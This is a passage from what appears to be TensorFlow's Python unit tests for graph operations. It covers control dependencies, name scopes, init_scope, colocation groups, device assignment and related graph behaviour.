self.assertItemsEqual([a_2.op, a_3.op], c_3.op.control_inputs)
self.assertItemsEqual([a_2.op, a_3.op, a_4.op], c_4.op.control_inputs)
self.assertItemsEqual([], d_1.op.control_inputs)
self.assertItemsEqual([], d_2.op.control_inputs)
self.assertItemsEqual([], d_3.op.control_inputs)
self.assertItemsEqual([], d_4.op.control_inputs)
self.assertItemsEqual([a_1.op], e_1.op.control_inputs)
self.assertItemsEqual([a_2.op], e_2.op.control_inputs)
self.assertItemsEqual([a_3.op], e_3.op.control_inputs)
self.assertItemsEqual([a_4.op], e_4.op.control_inputs)
def testRepeatedDependency(self):
g = ops.Graph()
a = g.create_op("TwoFloatOutputs", [], [dtypes.float32, dtypes.float32])
a_0, a_1 = a.outputs
with g.control_dependencies([a_0]):
b = _apply_op(g, "FloatOutput", [], [dtypes.float32])
with g.control_dependencies([a_1]):
c = _apply_op(g, "FloatOutput", [], [dtypes.float32])
self.assertEqual(b.op.control_inputs, [a])
self.assertEqual(c.op.control_inputs, [a])
def testNoControlDependencyWithDataDependency(self):
g = ops.Graph()
a = _apply_op(g, "FloatOutput", [], [dtypes.float32])
with g.control_dependencies([a]):
b = _apply_op(g, "Identity", [a], [dtypes.float32])
self.assertEqual(b.op.control_inputs, [])
class OpScopeTest(test_util.TensorFlowTestCase):
@test_util.run_in_graph_and_eager_modes
def testNames(self):
with ops.name_scope("foo", skip_on_eager=False) as foo:
self.assertEqual("foo/", foo)
with ops.name_scope("foo2", skip_on_eager=False) as foo2:
self.assertEqual("foo/foo2/", foo2)
with ops.name_scope(None, skip_on_eager=False) as empty1:
self.assertEqual("", empty1)
with ops.name_scope("foo3", skip_on_eager=False) as foo3:
self.assertEqual("foo3/", foo3)
with ops.name_scope("", skip_on_eager=False) as empty2:
self.assertEqual("", empty2)
with ops.name_scope("foo/", skip_on_eager=False) as outer_foo:
self.assertEqual("foo/", outer_foo)
with ops.name_scope("", skip_on_eager=False) as empty3:
self.assertEqual("", empty3)
with ops.name_scope("foo4", skip_on_eager=False) as foo4:
self.assertEqual("foo/foo4/", foo4)
with ops.name_scope("foo5//", skip_on_eager=False) as foo5:
self.assertEqual("foo5//", foo5)
with ops.name_scope("foo6", skip_on_eager=False) as foo6:
self.assertEqual("foo5//foo6/", foo6)
with ops.name_scope("/", skip_on_eager=False) as foo7:
self.assertEqual("/", foo7)
with ops.name_scope("//", skip_on_eager=False) as foo8:
self.assertEqual("//", foo8)
with ops.name_scope("a//b/c", skip_on_eager=False) as foo9:
self.assertEqual("foo/a//b/c/", foo9)
with ops.name_scope("a//b/c", skip_on_eager=False) as foo10:
self.assertEqual("a//b/c/", foo10)
@test_util.run_in_graph_and_eager_modes
def testEagerDefaultScopeName(self):
with ops.name_scope(None, "default", skip_on_eager=False) as scope:
self.assertEqual(scope, "default/")
with ops.name_scope(None, "default2", skip_on_eager=False) as scope2:
self.assertEqual(scope2, "default/default2/")
@test_util.run_in_graph_and_eager_modes
def testNameScopeV2IsReEntrant(self):
foo = ops.name_scope_v2("foo")
bar = ops.name_scope_v2("bar")
with foo as scope_name:
self.assertEqual("foo/", scope_name)
with foo as scope_name:
self.assertEqual("foo/foo/", scope_name)
with bar as scope_name:
self.assertEqual("foo/bar/", scope_name)
with foo as scope_name:
self.assertEqual("foo/bar/foo/", scope_name)
with bar as scope_name:
self.assertEqual("bar/", scope_name)
@test_util.run_deprecated_v1
def testNoScopeName(self):
g0 = ops.Graph()
values = [
g0.create_op("A", [], [dtypes.float32]),
g0.create_op("B", [], [dtypes.float32])
]
with self.assertRaises(ValueError):
with ops.name_scope(None, values=values):
pass
with self.assertRaises(ValueError):
with ops.name_scope(None, None, values):
pass
@test_util.run_deprecated_v1
def testEmptyScopeName(self):
g0 = ops.Graph()
a = g0.create_op("A", [], [dtypes.float32])
b = g0.create_op("B", [], [dtypes.float32])
with ops.name_scope("", values=[a, b]) as scope:
self.assertEqual("", scope)
self.assertEqual(g0, ops.get_default_graph())
with ops.name_scope("", "my_default_scope", [a, b]) as scope:
self.assertEqual("", scope)
self.assertEqual(g0, ops.get_default_graph())
@test_util.run_deprecated_v1
def testDefaultScopeName(self):
g0 = ops.Graph()
a = g0.create_op("A", [], [dtypes.float32])
b = g0.create_op("B", [], [dtypes.float32])
scope_name = "my_scope"
default_scope_name = "my_default_scope"
with ops.name_scope(scope_name, default_scope_name, [a, b]) as scope:
self.assertEqual("%s/" % scope_name, scope)
self.assertEqual(g0, ops.get_default_graph())
with ops.name_scope(None, default_scope_name, [a, b]) as scope:
self.assertEqual("%s/" % default_scope_name, scope)
self.assertEqual(g0, ops.get_default_graph())
with self.assertRaises(TypeError):
with ops.name_scope(scope_name, [a, b]):
pass
def _testGraphElements(self, graph_elements):
scope_name = "my_scope"
with ops.name_scope(scope_name, values=graph_elements) as scope:
self.assertEqual("%s/" % scope_name, scope)
self.assertEqual(graph_elements[0].graph, ops.get_default_graph())
g1 = ops.Graph()
a = g1.create_op("A", [], [dtypes.float32])
with self.assertRaises(ValueError):
with ops.name_scope(scope_name, values=graph_elements + [a]):
pass
@test_util.run_in_graph_and_eager_modes
def testGetCurrentNameScope(self):
self.assertEqual(ops.get_current_name_scope(), "")
with ops.name_scope_v2("aaa"):
self.assertEqual(ops.get_current_name_scope(), "aaa")
with ops.name_scope_v2("bbb"):
self.assertEqual(ops.get_current_name_scope(), "aaa/bbb")
self.assertEqual(ops.get_current_name_scope(), "aaa")
self.assertEqual(ops.get_current_name_scope(), "")
@test_util.run_deprecated_v1
def testTensor(self):
g0 = ops.Graph()
a = g0.create_op("A", [], [dtypes.float32])
b = g0.create_op("B", [], [dtypes.float32])
self._testGraphElements([a, b])
@test_util.run_deprecated_v1
def testSparseTensor(self):
g0 = ops.Graph()
a = g0.create_op("A", [], [dtypes.float32])
b = g0.create_op("B", [], [dtypes.float32])
sparse = sparse_tensor.SparseTensor(
_apply_op(g0, "Int64Output", [], [dtypes.int64]),
_apply_op(g0, "FloatOutput", [], [dtypes.float32]),
_apply_op(g0, "Int64Output", [], [dtypes.int64]))
self._testGraphElements([a, sparse, b])
@test_util.run_deprecated_v1
def testVariable(self):
g0 = ops.Graph()
with g0.as_default():
variable = variables.Variable([1.0])
a = g0.create_op("A", [], [dtypes.float32])
b = g0.create_op("B", [], [dtypes.float32])
self._testGraphElements([a, variable, b])
class InitScopeTest(test_util.TensorFlowTestCase):
def testClearsControlDependencies(self):
g = ops.Graph()
a_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
a_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
with g.as_default():
with g.control_dependencies([a_1]):
with g.control_dependencies([a_2]):
with ops.init_scope():
with g.control_dependencies([a_3]):
with g.control_dependencies([a_4]):
# deps [a_3, a_4]
b_3_4 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
# deps = [a_3]
b_3 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
# deps back to None
b_none = _apply_op(g, "FloatOutput", [], [dtypes.float32])
# deps back to [a_1, a_2]
b_1_2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
# deps back to [a_1]
b_1 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
with ops.init_scope():
# deps are None again
b_none2 = _apply_op(g, "FloatOutput", [], [dtypes.float32])
self.assertItemsEqual([a_3.op, a_4.op], b_3_4.op.control_inputs)
self.assertItemsEqual([a_3.op], b_3.op.control_inputs)
self.assertItemsEqual([], b_none.op.control_inputs)
self.assertItemsEqual([a_1.op, a_2.op], b_1_2.op.control_inputs)
self.assertItemsEqual([a_1.op], b_1.op.control_inputs)
self.assertItemsEqual([], b_none2.op.control_inputs)
def testLiftsOpsFromFunctions(self):
g0 = ops.Graph()
g1 = ops.Graph()
g1._building_function = True # pylint: disable=protected-access
g2 = ops.Graph()
g2._building_function = True # pylint: disable=protected-access
with g0.as_default():
with g1.as_default():
with g2.as_default():
with ops.init_scope():
_ = constant_op.constant(1.0)
self.assertLen(g2.get_operations(), 0)
self.assertLen(g1.get_operations(), 0)
self.assertLen(g0.get_operations(), 1)
def testPreservesDevices(self):
g0 = ops.Graph()
with g0.as_default(), ops.device("CPU:0"):
g1 = ops.Graph()
g1._building_function = True # pylint: disable=protected-access
with g1.as_default():
with ops.device("GPU:0"):
with ops.init_scope():
# init_scope should preserve device set under `g1`.
on_gpu = constant_op.constant(1.0)
self.assertEqual(on_gpu.device, "/device:GPU:0")
still_on_gpu = constant_op.constant(1.0)
self.assertEqual(still_on_gpu.device, "/device:GPU:0")
blank = constant_op.constant(1.0)
self.assertEqual(blank.device, "")
with ops.init_scope():
now_on_cpu = constant_op.constant(1.0)
self.assertEqual(now_on_cpu.device, "/device:CPU:0")
on_cpu = constant_op.constant(1.0)
self.assertEqual(on_cpu.device, "/device:CPU:0")
def testComposes(self):
g0 = ops.Graph()
g1 = ops.Graph()
g1._building_function = True # pylint: disable=protected-access
g2 = ops.Graph()
g2._building_function = True # pylint: disable=protected-access
g3 = ops.Graph()
g3._building_function = False # pylint: disable=protected-access
with g0.as_default():
with g1.as_default():
with ops.init_scope():
# This op should be lifted into g0.
_ = constant_op.constant(1.0)
self.assertIs(g0, ops.get_default_graph())
self.assertLen(g2.get_operations(), 0)
self.assertLen(g1.get_operations(), 0)
self.assertLen(g0.get_operations(), 1)
with g2.as_default():
with ops.init_scope():
# This op should be lifted into g0.
_ = constant_op.constant(1.0)
self.assertIs(g0, ops.get_default_graph())
with g3.as_default():
with ops.init_scope():
# This op should be lifted into g3, because g3 is not building a
# function.
_ = constant_op.constant(1.0)
self.assertIs(g3, ops.get_default_graph())
self.assertLen(g3.get_operations(), 1)
self.assertLen(g2.get_operations(), 0)
self.assertLen(g1.get_operations(), 0)
self.assertLen(g0.get_operations(), 2)
def testEscapesToEagerContext(self):
g = ops.Graph()
g._building_function = True # pylint: disable=protected-access
with context.eager_mode():
with context.graph_mode():
with g.as_default():
with ops.init_scope():
# Because g is building a function, init_scope should
# escape out to the eager context.
self.assertTrue(context.executing_eagerly())
# g should be reinstated as the default graph, and the
# graph context should be re-entered.
self.assertIs(g, ops.get_default_graph())
self.assertFalse(context.executing_eagerly())
def testStaysInEagerWhenOnlyEagerContextActive(self):
with context.eager_mode():
with ops.init_scope():
self.assertTrue(context.eager_mode())
self.assertTrue(context.eager_mode())
def testEscapesDefunWhenInEagerMode(self):
def function_with_variables():
with ops.init_scope():
self.v = resource_variable_ops.ResourceVariable(3)
return self.v.assign_add(1)
with context.eager_mode():
# Each invocation of function_with_variables recreates a variable.
self.assertEqual(4, int(function_with_variables()))
self.assertEqual(4, int(function_with_variables()))
compiled = eager_function.defun(function_with_variables)
# The init_scope in function_with_variables lifts the variable out
# of the graph function constructed by defun; hence,
# compiled now appears to be stateful.
self.assertEqual(4, int(compiled()))
self.assertEqual(5, int(compiled()))
def testEscapesDefunWhenInGraphMode(self):
def function_with_variables(name):
with ops.init_scope():
_ = variable_scope.get_variable(name, shape=(1,))
g = ops.Graph()
with g.as_default():
with self.cached_session():
# First ensure that graphs that are not building functions are
# not escaped.
function_with_variables("foo")
with self.assertRaisesRegex(ValueError,
r"Variable foo already exists.*"):
# This will fail because reuse is not set to True.
function_with_variables("foo")
compiled = eager_function.defun(function_with_variables)
compiled("bar")
self.assertEqual(
len(ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)), 2)
# The second call to `compiled` should not create variables: the
# init_scope has lifted the variable creation code out of the defun.
compiled("bar")
self.assertEqual(
len(ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)), 2)
def testEscapesNestedDefun(self):
def inner_function():
with ops.init_scope():
self.v = resource_variable_ops.ResourceVariable(1)
return self.v.assign_add(2)
def outer_function(inner=None):
with ops.init_scope():
self.v0 = resource_variable_ops.ResourceVariable(0)
return self.v0.assign_add(1) + inner()
with context.eager_mode():
# Each invocation of outer_function recreates variables.
self.assertEqual(4, int(outer_function(inner=inner_function)))
self.assertEqual(4, int(outer_function(inner=inner_function)))
compiled_inner = eager_function.defun(inner_function)
compiled_outer = eager_function.defun(outer_function)
# The init_scope lifts variables out of the graph functions
# constructed by defun; hence, compiled_outer should now appear to be
# stateful.
self.assertEqual(4, int(compiled_outer(inner=compiled_inner)))
self.assertEqual(7, int(compiled_outer(inner=compiled_inner)))
@test_util.run_v1_only("b/120545219")
def testFallsBackToGlobalGraphWhenAllGraphsAreBuildingFunctions(self):
with context.graph_mode():
ops.reset_default_graph()
# This doesn't push anything onto the graph stack, but it does
# set the stack's global graph.
global_graph = ops.get_default_graph()
fn_graph = ops.Graph()
# pylint: disable=protected-access
fn_graph._building_function = True
self.assertLen(ops._default_graph_stack.stack, 0)
with fn_graph.as_default():
self.assertLen(ops._default_graph_stack.stack, 1)
with ops.init_scope():
self.assertGreater(len(ops._default_graph_stack.stack), 1)
dummy = constant_op.constant(1.0)
self.assertLen(ops._default_graph_stack.stack, 1)
# Note that the global graph is _not_ on the graph stack.
self.assertLen(ops._default_graph_stack.stack, 0)
# Ensure that `dummy` was added to the global graph.
self.assertEqual(global_graph, dummy.graph)
# pylint: enable=protected-access
def testInstallsDefaultGraphWhenGraphStackIsEmptyInGraphMode(self):
with context.graph_mode():
# pylint: disable=protected-access
self.assertLen(ops._default_graph_stack.stack, 0)
with ops.init_scope():
self.assertGreater(len(ops._default_graph_stack.stack), 0)
self.assertLen(ops._default_graph_stack.stack, 0)
# pylint: enable=protected-access
def testPreservesNameScopeInGraphConstruction(self):
with ops.Graph().as_default():
function_graph = ops.Graph()
with function_graph.as_default():
with ops.name_scope("inner", skip_on_eager=False), ops.init_scope():
self.assertEqual(ops.get_name_scope(), "inner")
self.assertEqual(ops.get_name_scope(), "")
def testEnteringGraphFromEagerIsSticky(self):
with context.eager_mode():
g = ops.Graph()
with g.as_default():
with ops.init_scope():
self.assertFalse(context.executing_eagerly())
self.assertEqual(g, ops.get_default_graph())
def testMixGraphEager(self):
with context.eager_mode():
c = constant_op.constant(1.0)
with ops.Graph().as_default():
with self.assertRaisesRegex(RuntimeError,
"Attempting to capture an EagerTensor"):
math_ops.add(c, c)
c2 = constant_op.constant(2.0)
with self.assertRaisesRegex(TypeError, "Graph tensors"):
math_ops.add(c2, c2)
def testPreservesNameScopeInEagerExecution(self):
with context.eager_mode():
def foo():
with ops.name_scope("inner", skip_on_eager=False), ops.init_scope():
if context.executing_eagerly():
# A trailing slash is always appended when eager execution is
# enabled.
self.assertEqual(context.context().scope_name, "inner/")
else:
self.assertEqual(ops.get_name_scope(), "inner")
foo()
self.assertEqual(ops.get_name_scope(), "")
foo_compiled = eager_function.defun(foo)
foo_compiled()
self.assertEqual(ops.get_name_scope(), "")
def testExecutingEagerlyOutsideFunctions(self):
@def_function.function
def f():
return ops.executing_eagerly_outside_functions()
with context.graph_mode():
self.assertFalse(ops.executing_eagerly_outside_functions())
with session.Session():
# Need self.evaluate for these as the return type of functions is
# tensors.
self.assertFalse(self.evaluate(f()))
with context.eager_mode():
self.assertTrue(ops.executing_eagerly_outside_functions())
self.assertTrue(f())
with ops.Graph().as_default():
self.assertFalse(ops.executing_eagerly_outside_functions())
with session.Session():
self.assertFalse(self.evaluate(f()))
class GraphTest(test_util.TensorFlowTestCase):
def setUp(self):
ops.reset_default_graph()
def _AssertDefault(self, expected):
self.assertIs(expected, ops.get_default_graph())
def testResetDefaultGraphNesting(self):
g0 = ops.Graph()
with self.assertRaises(AssertionError):
with g0.as_default():
ops.reset_default_graph()
def testGraphContextManagerCancelsEager(self):
with context.eager_mode():
with ops.Graph().as_default():
self.assertFalse(context.executing_eagerly())
def testGraphContextManager(self):
g0 = ops.Graph()
with g0.as_default() as g1:
self.assertIs(g0, g1)
def testDefaultGraph(self):
orig = ops.get_default_graph()
self.assertFalse(ops.has_default_graph())
self._AssertDefault(orig)
g0 = ops.Graph()
self.assertFalse(ops.has_default_graph())
self._AssertDefault(orig)
context_manager_0 = g0.as_default()
self.assertFalse(ops.has_default_graph())
self._AssertDefault(orig)
with context_manager_0 as g0:
self._AssertDefault(g0)
with ops.Graph().as_default() as g1:
self.assertTrue(ops.has_default_graph())
self._AssertDefault(g1)
self._AssertDefault(g0)
self._AssertDefault(orig)
self.assertFalse(ops.has_default_graph())
def testPreventFeeding(self):
g = ops.Graph()
a = constant_op.constant(2.0)
self.assertTrue(g.is_feedable(a))
g.prevent_feeding(a)
self.assertFalse(g.is_feedable(a))
@test_util.run_deprecated_v1
def testPreventFetching(self):
g = ops.Graph()
a = constant_op.constant(2.0)
self.assertTrue(g.is_fetchable(a))
g.prevent_fetching(a.op)
self.assertFalse(g.is_fetchable(a))
def testAsGraphElementConversions(self):
class ConvertibleObj(object):
def _as_graph_element(self):
return "FloatOutput:0"
class NonConvertibleObj(object):
pass
g = ops.Graph()
a = _apply_op(g, "FloatOutput", [], [dtypes.float32])
self.assertEqual(a, g.as_graph_element(ConvertibleObj()))
with self.assertRaises(TypeError):
g.as_graph_element(NonConvertibleObj())
# Regression test against creating custom __del__ functions in classes
# involved in cyclic references, e.g. Graph and Operation. (Python won't gc
# cycles that require calling a __del__ method, because the __del__ method can
# theoretically increase the object's refcount to "save" it from gc, and any
# already-deleted objects in the cycle would have be to restored.)
def testGarbageCollected(self):
# Create a graph we can delete and a weak reference to monitor if it's gc'd
g = ops.Graph()
g_ref = weakref.ref(g)
# Create some ops
with g.as_default():
a = constant_op.constant(2.0)
b = constant_op.constant(3.0)
c = math_ops.add(a, b)
# Create a session we can delete
with session.Session(graph=g) as sess:
self.evaluate(c)
# Delete all references and trigger gc
del g
del a
del b
del c
del sess
gc.collect()
self.assertIsNone(g_ref())
def testRunnableAfterInvalidShape(self):
with ops.Graph().as_default():
with self.assertRaises(ValueError):
math_ops.add([1, 2], [1, 2, 3])
a = constant_op.constant(1)
with session.Session() as sess:
self.evaluate(a)
def testRunnableAfterInvalidShapeWithKernelLabelMap(self):
g = ops.Graph()
with g.as_default():
with g._kernel_label_map({"KernelLabelRequired": "overload_1"}):
with self.assertRaises(ValueError):
test_ops.kernel_label_required(1)
a = constant_op.constant(1)
with session.Session() as sess:
self.evaluate(a)
class AttrScopeTest(test_util.TensorFlowTestCase):
def _get_test_attrs(self):
x = control_flow_ops.no_op()
try:
a = compat.as_text(x.get_attr("_A"))
except ValueError:
a = None
try:
b = compat.as_text(x.get_attr("_B"))
except ValueError:
b = None
return (a, b)
@test_util.run_deprecated_v1
def testNoLabel(self):
with self.cached_session():
self.assertAllEqual((None, None), self._get_test_attrs())
@test_util.run_deprecated_v1
def testLabelMap(self):
with self.cached_session() as sess:
a1 = self._get_test_attrs()
with sess.graph._attr_scope({
"_A": attr_value_pb2.AttrValue(s=compat.as_bytes("foo"))
}):
a2 = self._get_test_attrs()
with sess.graph._attr_scope({
"_A": None,
"_B": attr_value_pb2.AttrValue(s=compat.as_bytes("bar"))
}):
a3 = self._get_test_attrs()
with sess.graph._attr_scope({
"_A": attr_value_pb2.AttrValue(s=compat.as_bytes("baz"))
}):
a4 = self._get_test_attrs()
a5 = self._get_test_attrs()
a6 = self._get_test_attrs()
a7 = self._get_test_attrs()
self.assertAllEqual((None, None), a1)
self.assertAllEqual(("foo", None), a2)
self.assertAllEqual((None, "bar"), a3)
self.assertAllEqual(("baz", "bar"), a4)
self.assertAllEqual((None, "bar"), a5)
self.assertAllEqual(("foo", None), a6)
self.assertAllEqual((None, None), a7)
class KernelLabelTest(test_util.TensorFlowTestCase):
@test_util.run_deprecated_v1
def testNoLabel(self):
with self.cached_session():
self.assertAllEqual(b"My label is: default",
test_ops.kernel_label().eval())
@test_util.run_deprecated_v1
def testLabelMap(self):
with self.cached_session() as sess:
default_1 = test_ops.kernel_label()
# pylint: disable=protected-access
with sess.graph._kernel_label_map({"KernelLabel": "overload_1"}):
overload_1_1 = test_ops.kernel_label()
with sess.graph._kernel_label_map({"KernelLabel": "overload_2"}):
overload_2 = test_ops.kernel_label()
with sess.graph._kernel_label_map({"KernelLabel": ""}):
default_2 = test_ops.kernel_label()
overload_1_2 = test_ops.kernel_label()
# pylint: enable=protected-access
default_3 = test_ops.kernel_label()
self.assertAllEqual(b"My label is: default", self.evaluate(default_1))
self.assertAllEqual(b"My label is: default", self.evaluate(default_2))
self.assertAllEqual(b"My label is: default", self.evaluate(default_3))
self.assertAllEqual(b"My label is: overload_1",
self.evaluate(overload_1_1))
self.assertAllEqual(b"My label is: overload_1",
self.evaluate(overload_1_2))
self.assertAllEqual(b"My label is: overload_2", self.evaluate(overload_2))
class AsGraphDefTest(test_util.TensorFlowTestCase):
def testGraphDefVersion(self):
"""Test that the graphdef version is plumbed through to kernels."""
with ops.Graph().as_default() as g:
version = g.graph_def_versions.producer
with self.session(graph=g):
v = test_ops.graph_def_version().eval()
self.assertEqual(version, v)
def testAddShapes(self):
with ops.Graph().as_default() as g:
t1, t2, t3, t4, t5 = _apply_op(g, "FiveFloatOutputs", [],
[dtypes.float32] * 5)
t1.set_shape(None)
t2.set_shape([])
t3.set_shape([None])
t4.set_shape([43, 37])
t5.set_shape([43, None])
b = constant_op.constant(1.0) # pylint: disable=unused-variable
gd = g.as_graph_def(add_shapes=True)
self.assertProtoEqualsVersion("""
node { name: "FiveFloatOutputs" op: "FiveFloatOutputs"
attr {
key: "_output_shapes"
value {
list {
shape { unknown_rank: true }
shape { }
shape { dim { size: -1 } }
shape { dim { size: 43 } dim { size: 37 } }
shape { dim { size: 43 } dim { size: -1 } }
}
}
}
}
node { name: "Const" op: "Const"
attr {
key: "_output_shapes"
value {
list {
shape { }
}
}
}
attr {
key: "dtype"
value { type: DT_FLOAT }
}
attr {
key: "value"
value {
tensor {
dtype: DT_FLOAT
tensor_shape { }
float_val: 1.0 } } } }
""", gd)
@ops.RegisterStatistics("a", "flops")
def _calc_a_forward_flops(unused_graph, unused_node):
return ops.OpStats("flops", 20)
class StatisticsTest(test_util.TensorFlowTestCase):
def testRegisteredNode(self):
graph = ops.Graph()
node = ops._NodeDef("a", "an_a")
flops = ops.get_stats_for_node_def(graph, node, "flops")
self.assertEqual(20, flops.value)
missing_stat = ops.get_stats_for_node_def(graph, node, "missing_stat")
self.assertEqual(None, missing_stat.value)
def testUnregisteredNode(self):
graph = ops.Graph()
node = ops._NodeDef("b", "a_b")
weight_params = ops.get_stats_for_node_def(graph, node, "weight_params")
self.assertEqual(None, weight_params.value)
def testAccumulateStatistics(self):
flops_total = ops.OpStats("flops")
self.assertEqual(None, flops_total.value)
second_flops = ops.OpStats("flops", 3)
flops_total += second_flops
self.assertEqual(3, flops_total.value)
class DeviceStackTest(test_util.TensorFlowTestCase):
@test_util.run_deprecated_v1
def testBasicDeviceAssignmentMetadata(self):
def device_func(unused_op):
return "/cpu:*"
const_zero = constant_op.constant([0.0], name="zero")
with ops.device("/cpu"):
const_one = constant_op.constant([1.0], name="one")
with ops.device("/cpu:0"):
const_two = constant_op.constant([2.0], name="two")
with ops.device(device_func):
const_three = constant_op.constant(3.0, name="three")
self.assertEqual(0, len(const_zero.op._device_assignments))
one_list = const_one.op._device_assignments
self.assertEqual(1, len(one_list))
self.assertEqual("/cpu", one_list[0].obj)
self.assertEqual("ops_test.py", os.path.basename(one_list[0].filename))
two_list = const_two.op._device_assignments
self.assertEqual(2, len(two_list))
devices = [t.obj for t in two_list]
self.assertEqual(set(["/cpu", "/cpu:0"]), set(devices))
three_list = const_three.op._device_assignments
self.assertEqual(1, len(three_list))
func_description = three_list[0].obj
expected_regex = r"device_func<.*ops_test.py, [0-9]+"
self.assertRegex(func_description, expected_regex)
@test_util.run_deprecated_v1
def testDeviceAssignmentMetadataForGraphDeviceAndTfDeviceFunctions(self):
with ops.device("/cpu"):
const_one = constant_op.constant([1.0], name="one")
with ops.get_default_graph().device("/cpu"):
const_two = constant_op.constant([2.0], name="two")
one_metadata = const_one.op._device_assignments[0]
two_metadata = const_two.op._device_assignments[0]
# Verify both types of device assignment return the right stack info.
self.assertRegex("ops_test.py", os.path.basename(one_metadata.filename))
self.assertEqual(one_metadata.filename, two_metadata.filename)
self.assertEqual(one_metadata.lineno + 2, two_metadata.lineno)
class ColocationGroupTest(test_util.TensorFlowTestCase):
@test_util.run_deprecated_v1
def testBasic(self):
a = constant_op.constant([2.0], name="a")
with ops.colocate_with(a.op):
b = constant_op.constant(3.0)
c = constant_op.constant(4.0)
self.assertEqual([b"loc:@a"], a.op.colocation_groups())
self.assertEqual([b"loc:@a"], b.op.colocation_groups())
with self.assertRaises(ValueError):
c.op.get_attr("_class")
@test_util.run_deprecated_v1
def testBasicColocationMetadata(self):
const_two = constant_op.constant([2.0], name="two")
with ops.colocate_with(const_two.op):
const_three = constant_op.constant(3.0, name="three")
locations_dict = const_three.op._colocation_dict
self.assertIn("two", locations_dict)
metadata = locations_dict["two"]
self.assertIsNone(metadata.obj)
# Check that this test's filename is recorded as the file containing the
# colocation statement.
self.assertEqual("ops_test.py", os.path.basename(metadata.filename))
@test_util.run_deprecated_v1
def testColocationDeviceInteraction(self):
with ops.device("/cpu:0"):
with ops.device("/device:GPU:0"):
a = constant_op.constant([2.0], name="a")
with ops.colocate_with(a.op):
# 'b' is created in the scope of /cpu:0, but it is
# colocated with 'a', which is on '/device:GPU:0'. colocate_with
# overrides devices because it is a stronger constraint.
b = constant_op.constant(3.0)
self.assertEqual([b"loc:@a"], b.op.colocation_groups())
self.assertEqual(a.op.device, b.op.device)
@test_util.run_deprecated_v1
def testColocationCanonicalization(self):
with ops.device("/device:GPU:0"):
_ = constant_op.constant(2.0)
with ops.device(lambda op: "/device:GPU:0"):
b = constant_op.constant(3.0)
with ops.get_default_graph().colocate_with(b):
with ops.device("/device:GPU:0"):
c = constant_op.constant(4.0)
# A's device will be /device:GPU:0
# B's device will be /device:GPU:0
# C's device will be /device:GPU:0 because it
# inherits B's device name, after canonicalizing the names.
self.assertEqual(b.op.device, c.op.device)
@test_util.run_deprecated_v1
def testLocationOverrides(self):
with ops.device("/cpu:0"):
with ops.device("/device:GPU:0"):
a = constant_op.constant([2.0], name="a")
# Note that this colocation is "redundant", since we are
# within the scope of "/device:GPU:0". However, we would like to
# preserve in the GraphDef that these two ops should be
# colocated in a portable way.
with ops.colocate_with(a.op):
b = constant_op.constant(3.0)
c = constant_op.constant(4.0)
d = constant_op.constant(5.0)
self.assertEqual([b"loc:@a"], b.op.colocation_groups())
self.assertEqual("/device:GPU:0", a.op.device)
self.assertEqual(a.op.device, b.op.device)
# Test that device function stack is restored.
self.assertEqual("/device:GPU:0", c.op.device)
self.assertEqual("/device:CPU:0", d.op.device)
@test_util.run_deprecated_v1
def testNestedColocateWith(self):
a = constant_op.constant([2.0], name="a")
with ops.colocate_with(a.op):
b = constant_op.constant(3.0)
with ops.colocate_with(b.op):
c = constant_op.constant(4.0)
self.assertEqual([b"loc:@a"], b.op.colocation_groups())
self.assertEqual([b"loc:@a"], c.op.colocation_groups())
@test_util.run_deprecated_v1
def testMultiColocationGroups(self):
a = constant_op.constant([2.0], name="a")
b = constant_op.constant(3.0, name="b")
with ops.colocate_with(a.op):
with ops.colocate_with(b.op):
c = constant_op.constant(4.0)
self.assertEqual(set([b"loc:@a", b"loc:@b"]), set(c.op.colocation_groups()))
@test_util.run_deprecated_v1
def testColocationIgnoreStack(self):
a = constant_op.constant([2.0], name="a")
b = constant_op.constant(3.0, name="b")
with ops.colocate_with(a.op):
with ops.colocate_with(b.op, ignore_existing=True):
c = constant_op.constant(4.0)
self.assertEqual(set([b"loc:@b"]), set(c.op.colocation_groups()))
@test_util.run_deprecated_v1
def testColocateWithReset(self):
a = constant_op.constant([2.0], name="a")
with ops.colocate_with(a.op):
b = constant_op.constant(3.0, name="b")
with ops.colocate_with(None, ignore_existing=True):
c = constant_op.constant(4.0, name="c")
self.assertEqual([b"loc:@a"], b.op.colocation_groups())
self.assertEqual([b"loc:@c"], c.op.colocation_groups())
@test_util.run_deprecated_v1
def testColocateWithInitialNoneThenNested(self):
a = constant_op.constant([2.0], name="a")
with ops.colocate_with(a.op):
with ops.colocate_with(None, ignore_existing=True):
b = constant_op.constant(3.0, name="b")
with ops.colocate_with(b.op):
c = constant_op.constant(4.0, name="c")
self.assertEqual([b"loc:@b"], b.op.colocation_groups())
self.assertEqual([b"loc:@b"], c.op.colocation_groups())
@test_util.run_deprecated_v1
def testColocateVariables(self):
a = variables.Variable([2.0], name="a")
with ops.colocate_with(a.op):
b = variables.Variable([3.0], name="b")
self.assertEqual([b"loc:@a"], b.op.colocation_groups())
@test_util.run_deprecated_v1
def testColocateResourceVariablesInFunction(self):
with ops.device("/device:CPU:0"):
a = resource_variable_ops.ResourceVariable(1.0)
@def_function.function
def f():
with ops.colocate_with(a):
b = array_ops.ones([], name="output")
self.assertEqual("/device:CPU:0", b.op.device)
f()
def testColocateWithVariableInFunction(self):
v = variables.Variable(1.)
@def_function.function
def f():
with ops.colocate_with(v):
return array_ops.ones([], name="output")
f()
graph_def = f.get_concrete_function().graph.as_graph_def()
wrap_function.function_from_graph_def(graph_def, [], ["output"])
class DeprecatedTest(test_util.TensorFlowTestCase):
def testSuccess(self):
with ops.Graph().as_default() as g:
test_util.set_producer_version(g, 7)
old = test_ops.old()
with self.session(graph=g):
old.run()
def _error(self):
return ((r"Op Old is not available in GraphDef version %d\. "
r"It has been removed in version 8\. For reasons\.") %
versions.GRAPH_DEF_VERSION)
def testGraphConstructionFail(self):
with ops.Graph().as_default():
with self.assertRaisesRegex(NotImplementedError, self._error()):
test_ops.old()
class NameScopeTest(test_util.TensorFlowTestCase):
def testStripAndPrependScope(self):
strs = [
"hidden1/hidden1/weights", # Same prefix. Should strip.
"hidden1///hidden1/weights", # Extra "/". Should strip.
